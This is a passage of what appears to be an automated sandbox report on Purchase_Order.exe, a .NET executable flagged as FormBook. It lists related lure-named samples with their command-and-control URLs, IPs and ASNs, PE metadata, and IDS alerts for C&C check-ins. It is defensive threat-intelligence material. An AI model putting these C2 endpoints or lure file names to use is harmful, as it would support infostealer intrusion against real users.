                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          15:01:14API Interceptor83x Sleep call for process: Purchase_Order.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          213.186.33.5Payment slip.exeGet hashmaliciousBrowse
                                                                          • www.lebigconcours.com/3edq/?2dUX-PAP=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&D6Otan=1bu800r
                                                                          Shipping Draft Doc.exeGet hashmaliciousBrowse
                                                                          • www.geraldineprofit.com/ajsp/?m2MXt=mX3FC0rWOmZLwh4qbfvKXGX9RdF3hnuYXE+OWqE17ZQMzXMEP9+qCOq0VSXzZEPsPtF9&g6bX=7nfxC0PhW
                                                                          Payment_Advice.exeGet hashmaliciousBrowse
                                                                          • www.prltoday.com/uqf5/?9rw=F/Xh9v+g7Cdwl5upkcpMZ8e4b+3WpLzzeVKIM3R3duzbf3evtWksiEg580fE4Vra9h2o&s6=bPYXfd3Xq0VHDp
                                                                          statement.exeGet hashmaliciousBrowse
                                                                          • www.economiemalin.com/s5cm/?jZVXl=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmewkBggS6qKyN&t6AdVb=NdfHc4_xG2JHQlV
                                                                          1092991(JB#082).exeGet hashmaliciousBrowse
                                                                          • www.lebigconcours.com/3edq/?JfEt9j6h=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAeo737h+ZhVc&ojn0d=RzuliD
                                                                          OUTSTANDING PAYMENT REMINDER.exeGet hashmaliciousBrowse
                                                                          • www.poacolors.com/ngvm/?FPWhHFq=8TcJTBzsK+HhuKYXehH9492pDxzGvvxdxfrG/qrl9m6Ckg/etRlY8SCi3gsL+m2BF2U4&Bj=lHL8SXfh3Ju
                                                                          ZEtvKwfrmf.exeGet hashmaliciousBrowse
                                                                          • www.hunab.tech/a8si/?ndiHKd=R2Mdy&Jdvd=faV7garRSu7JiSdjFrXmcIZZ3FAmdB/GT7EG2sZeIe9fZGAKSSr6iowPvTsgHFLaJTVrUqirQA==
                                                                          invoice.exeGet hashmaliciousBrowse
                                                                          • www.lebigconcours.com/3edq/?URZh=c8gg2kDsKkY9JoWcOJXGZzy/zRsju88ib1/w1WqO+PGwvG3GHLTzoABLAdIr4axGHE8b&jL30vv=afhhplx
                                                                          1bb71f86_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                          • www.saveursdelaferme.com/njhr/?_89pb=6BYgV36frgEPm4Bks1lvfbqyImS2+mAjTc1MWw0zm1TdS4XMIGEQigd8Qb1RKTDe9sQA&FPWl=Cd8tG
                                                                          correct invoice.exeGet hashmaliciousBrowse
                                                                          • www.economiemalin.com/s5cm/?Zh3XHBo=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmezI7jh+Bp9TckTab0g==&Xv0Hzp=j0Dx
                                                                          PAYMENT INSTRUCTIONS COPY.exeGet hashmaliciousBrowse
                                                                          • www.economiemalin.com/s5cm/?l4s=idQL&FVntHje=ejtPsXeQXSJB05Sij4NQ5TV7+3Vt2QhSAwzNEAtOIN6S2xaseggAFHdmezI7jh+Bp9TckTab0g==
                                                                          SNBDBM2No4.exeGet hashmaliciousBrowse
                                                                          • www.novaquitaine-solidaire.com/et9g/?w0=4U5sRBKo3qDJNDI635oEnC3KQabibOMqkqUUwOxjTLMtlInI5GXOy7itNHn8aad3HlGmYgkDjQ==&7nuTA=T8HXOTYpSf
                                                                          4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                          • microstart.fr/.0wejmrx/?action=fbgen&v=110&crc=669
                                                                          APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exeGet hashmaliciousBrowse
                                                                          • www.novaquitaine-solidaire.com/o86d/?Sh=wK9hQdkhVQWgDCh8+dkduL3mY3KqrYWSQYD3kDydN3JlpNwOptAmUxldmuBb4nIT5fLk&2dqLW0=RXBPDPWx
                                                                          Wire transfer.exeGet hashmaliciousBrowse
                                                                          • www.ouvrirrestaurant.net/ca84/?BvI=TFQavLVBBQ5MAl0nGhgcmAPNNXUDTmBtP2ujrG6OtwDwmhnjgecl+//MMQVA/n6VgqZO&J690D=ej8PjzaXfDt
                                                                          Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                          • www.novaquitaine-solidaire.com/o86d/?GPTl=wK9hQdkhVQWgDCh8+dkduL3mY3KqrYWSQYD3kDydN3JlpNwOptAmUxldmtty7n0rw8+y92HPuA==&BlB=O2JthfYxo
                                                                          payment.exeGet hashmaliciousBrowse
                                                                          • www.booster-tresorerie.com/ma3c/?tXcT=MXExT&Qzr=AEsqPnefOfqyUyQeHr0R41o7ooykHlvhqSjzuEoZYb4TETLbmk5XUDPZoclEVPdpRNDEu2OJKg==
                                                                          order drawing 101.exeGet hashmaliciousBrowse
                                                                          • www.booster-tresorerie.com/ma3c/?R2JlOJ=AEsqPnefOfqyUyQeHr0R41o7ooykHlvhqSjzuEoZYb4TETLbmk5XUDPZocpEGfRqIdDS&GV_P=8pDpKpNHoZ_dLx
                                                                          pending orders0308 D2101002610 pdf.exeGet hashmaliciousBrowse
                                                                          • www.navigateur-remunerateur.com/chue/
                                                                          Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                          • www.del-tekzen.com/evpn/?CZa4=v3ZDcR7pjvwz1UjDln28kRDl7qvPbzZbdIYAmpXghlqnmfKnmXU7bNFuexrDnWNoWbbs&CPWhW=C8eHk

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          www.gorditasdemaiz.comPayment Advice.exeGet hashmaliciousBrowse
                                                                          • 151.101.0.119
                                                                          td-balancer-euw2-6-109.wixdns.net3arZKnr21W.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          QUOTE061021.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Sleek_Free.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          619wGDCTZA.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          DHL_AWB_NO#907853880911.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          919780-920390.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          swift_08_06_21.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          2990213.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          03062021.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          rtgs_pdf.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          03062021.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Shipping Docs677.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          SKMBT_C22421033008180 png.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          swift.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Swift copy_9808.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Order756576747876874653.gz.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          Product_Samples.exeGet hashmaliciousBrowse
                                                                          • 35.246.6.109
                                                                          www.a-prime-india-demataccount.zoneNew Order.exeGet hashmaliciousBrowse
                                                                          • 172.67.155.26
                                                                          www.culturalinterface.netNew Order.exeGet hashmaliciousBrowse
                                                                          • 172.67.187.224
                                                                          03062021.exeGet hashmaliciousBrowse
                                                                          • 172.67.187.224
                                                                          Payment_Advice.exeGet hashmaliciousBrowse
                                                                          • 104.21.64.212
                                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                                          • 104.21.64.212
                                                                          Payment Advice.exeGet hashmaliciousBrowse
                                                                          • 104.21.64.212
                                                                          www.trainup-wall.com03062021.exeGet hashmaliciousBrowse
                                                                          • 45.140.167.161
                                                                          www.prltoday.comPayment_Advice.exeGet hashmaliciousBrowse
                                                                          • 213.186.33.5

                                                                          ASN

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          OVHFRORDER-21611docx.exeGet hashmaliciousBrowse
                                                                          • 87.98.245.48
                                                                          s6ljEIsdF3.exeGet hashmaliciousBrowse
                                                                          • 176.31.95.228
                                                                          hb5swSGLBT.exeGet hashmaliciousBrowse
                                                                          • 176.31.95.228
                                                                          CM0Q30sK3K.exeGet hashmaliciousBrowse
                                                                          • 176.31.95.228
                                                                          zIrx1wUddJ.exeGet hashmaliciousBrowse
                                                                          • 144.217.14.109
                                                                          8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                          • 51.222.56.151
                                                                          New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                          • 51.222.56.151
                                                                          New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                          • 51.222.56.151
                                                                          Request For Quote.exeGet hashmaliciousBrowse
                                                                          • 158.69.138.23
                                                                          payload.htmlGet hashmaliciousBrowse
                                                                          • 145.239.131.60
                                                                          6VYNUalwUt.exeGet hashmaliciousBrowse
                                                                          • 178.33.222.241
                                                                          New Inquiry.exeGet hashmaliciousBrowse
                                                                          • 158.69.138.23
                                                                          New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                          • 51.222.56.151
                                                                          Requestforquote.exeGet hashmaliciousBrowse
                                                                          • 158.69.138.23
                                                                          SecuriteInfo.com.Trojan.PackedNET.721.2973.exeGet hashmaliciousBrowse
                                                                          • 149.202.83.171
                                                                          SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                                          • 51.210.201.99
                                                                          ORDER-6010.pdf.exeGet hashmaliciousBrowse
                                                                          • 178.33.222.241
                                                                          U03c2doc.exeGet hashmaliciousBrowse
                                                                          • 5.135.185.231
                                                                          PO.xlsxGet hashmaliciousBrowse
                                                                          • 51.210.201.99
                                                                          ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
                                                                          • 79.137.68.187
                                                                          XIAOZHIYUN1-AS-APICIDCNETWORKUSlTAPQJikGw.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.161
                                                                          Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                                          • 156.241.53.161
                                                                          bank details.exeGet hashmaliciousBrowse
                                                                          • 156.224.66.89
                                                                          rtgs_pdf.exeGet hashmaliciousBrowse
                                                                          • 103.44.89.157
                                                                          tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.161
                                                                          qXDtb88hht.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          819780-820390.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.97
                                                                          ye4nYRzxJa.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          Telex_Payment.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.223
                                                                          fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          bbZdhGxjJW.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                          • 154.207.58.172
                                                                          Invoice.exeGet hashmaliciousBrowse
                                                                          • 156.224.66.89
                                                                          ENrFQVzLHE.exeGet hashmaliciousBrowse
                                                                          • 156.255.140.216
                                                                          x86Get hashmaliciousBrowse
                                                                          • 156.255.211.4
                                                                          Payment Advice-Pdf.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.2
                                                                          Ack0527073465.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.2
                                                                          Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                          • 156.241.53.238
                                                                          sample products 1,2,&,4.exeGet hashmaliciousBrowse
                                                                          • 156.234.115.167

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase_Order.exe.log
                                                                          Process:C:\Users\user\Desktop\Purchase_Order.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1400
                                                                          Entropy (8bit):5.344635889251176
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEg:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHV
                                                                          MD5:394E646B019FF472CE37EE76A647A27F
                                                                          SHA1:BD5872D88EE9CD2299B5F0E462C53D9E7040D6DA
                                                                          SHA-256:2295A0B1F6ACD75FB5D038ADE65725EDF3DDF076107AEA93E4A864E35974AE2A
                                                                          SHA-512:7E95510C85262998AECC9A06A73A5BF6352304AF6EE143EC7E48A17473773F33A96A2F4146446444789B8BCC9B83372A227DC89C3D326A2E142BCA1E1A9B4809
                                                                          Malicious:true
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.297638335921384
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Purchase_Order.exe
                                                                          File size:1532416
                                                                          MD5:4aa8159742becd97f9ecdda33798b065
                                                                          SHA1:775aee28c33102de8c4bdd45dd09821b717b8678
                                                                          SHA256:65c6621762bb1bb1589a4a58d4ab2d3fa7c02e581b217b86ed2ff51227d7565b
                                                                          SHA512:ab15ec93f68f355de7a6cb66c089f1956dd29c301dbdfa3145083cfb5c653c24083f9c01ed5398a2631e8c1a37ffcdae7b3b38b90c1836c29af2c72ef23e0366
                                                                          SSDEEP:24576:VENeBUdtwsEgws8e/z8YEoqSg5LlJfH6zMIDsxTt8ZnIYqmaGHB/7YaL:uwBUwsEgws8e5U/BldOpIY3rHBDYaL
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. ....................................@................................

                                                                          File Icon

                                                                          Icon Hash:e0c6a169f4bed870

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x54f9d2
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x60C3160F [Fri Jun 11 07:51:43 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x14f9800x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x28354.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x17a0000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14f8480x1c.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x14d9d80x14da00False0.694698535266data7.38800218232IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x1500000x283540x28400False0.599797408773data6.35218035715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x17a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x1501a00x468GLS_BINARY_LSB_FIRST
                                                                          RT_ICON0x1506180x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                          RT_ICON0x1516d00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                          RT_ICON0x153c880x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                          RT_ICON0x157ec00x10828dBase III DBT, version number 0, next free block index 40
                                                                          RT_ICON0x1686f80xf255PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                          RT_GROUP_ICON0x1779600x5adata
                                                                          RT_VERSION0x1779cc0x396big endian ispell hash file (?),
                                                                          RT_MANIFEST0x177d740x5daXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0000 0x04b0
                                                                          LegalCopyrightCopyright 2015 Benz
                                                                          Assembly Version1.6.0.65
                                                                          InternalNameAsAnyMarshaler.exe
                                                                          FileVersion1.6.0.65
                                                                          CompanyNameTown and Country Convenience Stores
                                                                          LegalTrademarks
                                                                          Comments
                                                                          ProductNameCDWorkFlow
                                                                          ProductVersion1.6.0.65
                                                                          FileDescriptionCDWorkFlow
                                                                          OriginalFilenameAsAnyMarshaler.exe

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          06/11/21-15:02:33.885599TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7162.241.253.69
                                                                          06/11/21-15:02:33.885599TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7162.241.253.69
                                                                          06/11/21-15:02:33.885599TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.7162.241.253.69
                                                                          06/11/21-15:02:39.242866TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.734.102.136.180
                                                                          06/11/21-15:02:39.242866TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.734.102.136.180
                                                                          06/11/21-15:02:39.242866TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.734.102.136.180
                                                                          06/11/21-15:02:39.380529TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.7
                                                                          06/11/21-15:02:44.697962TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7156.241.53.127
                                                                          06/11/21-15:02:44.697962TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7156.241.53.127
                                                                          06/11/21-15:02:44.697962TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.7156.241.53.127
                                                                          06/11/21-15:02:56.303221TCP1201ATTACK-RESPONSES 403 Forbidden8049739104.21.64.212192.168.2.7
                                                                          06/11/21-15:03:01.563910TCP1201ATTACK-RESPONSES 403 Forbidden804974634.102.136.180192.168.2.7
                                                                          06/11/21-15:03:06.762138TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.745.140.167.161
                                                                          06/11/21-15:03:06.762138TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.745.140.167.161
                                                                          06/11/21-15:03:06.762138TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975280192.168.2.745.140.167.161
                                                                          06/11/21-15:03:13.179290TCP1201ATTACK-RESPONSES 403 Forbidden8049753160.16.235.37192.168.2.7
                                                                          06/11/21-15:03:23.700836TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.735.246.6.109
                                                                          06/11/21-15:03:23.700836TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.735.246.6.109
                                                                          06/11/21-15:03:23.700836TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.735.246.6.109

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jun 11, 2021 15:02:23.105751038 CEST4972480192.168.2.7213.186.33.5
                                                                          Jun 11, 2021 15:02:23.164691925 CEST8049724213.186.33.5192.168.2.7
                                                                          Jun 11, 2021 15:02:23.164932013 CEST4972480192.168.2.7213.186.33.5
                                                                          Jun 11, 2021 15:02:23.166137934 CEST4972480192.168.2.7213.186.33.5
                                                                          Jun 11, 2021 15:02:23.234405994 CEST8049724213.186.33.5192.168.2.7
                                                                          Jun 11, 2021 15:02:23.234642029 CEST4972480192.168.2.7213.186.33.5
                                                                          Jun 11, 2021 15:02:23.234913111 CEST4972480192.168.2.7213.186.33.5
                                                                          Jun 11, 2021 15:02:23.292299032 CEST8049724213.186.33.5192.168.2.7
                                                                          Jun 11, 2021 15:02:28.318073988 CEST4972980192.168.2.7151.101.0.119
                                                                          Jun 11, 2021 15:02:28.364393950 CEST8049729151.101.0.119192.168.2.7
                                                                          Jun 11, 2021 15:02:28.365627050 CEST4972980192.168.2.7151.101.0.119
                                                                          Jun 11, 2021 15:02:28.365811110 CEST4972980192.168.2.7151.101.0.119
                                                                          Jun 11, 2021 15:02:28.410748005 CEST8049729151.101.0.119192.168.2.7
                                                                          Jun 11, 2021 15:02:28.514069080 CEST8049729151.101.0.119192.168.2.7
                                                                          Jun 11, 2021 15:02:28.514094114 CEST8049729151.101.0.119192.168.2.7
                                                                          Jun 11, 2021 15:02:28.514415979 CEST4972980192.168.2.7151.101.0.119
                                                                          Jun 11, 2021 15:02:28.514532089 CEST4972980192.168.2.7151.101.0.119
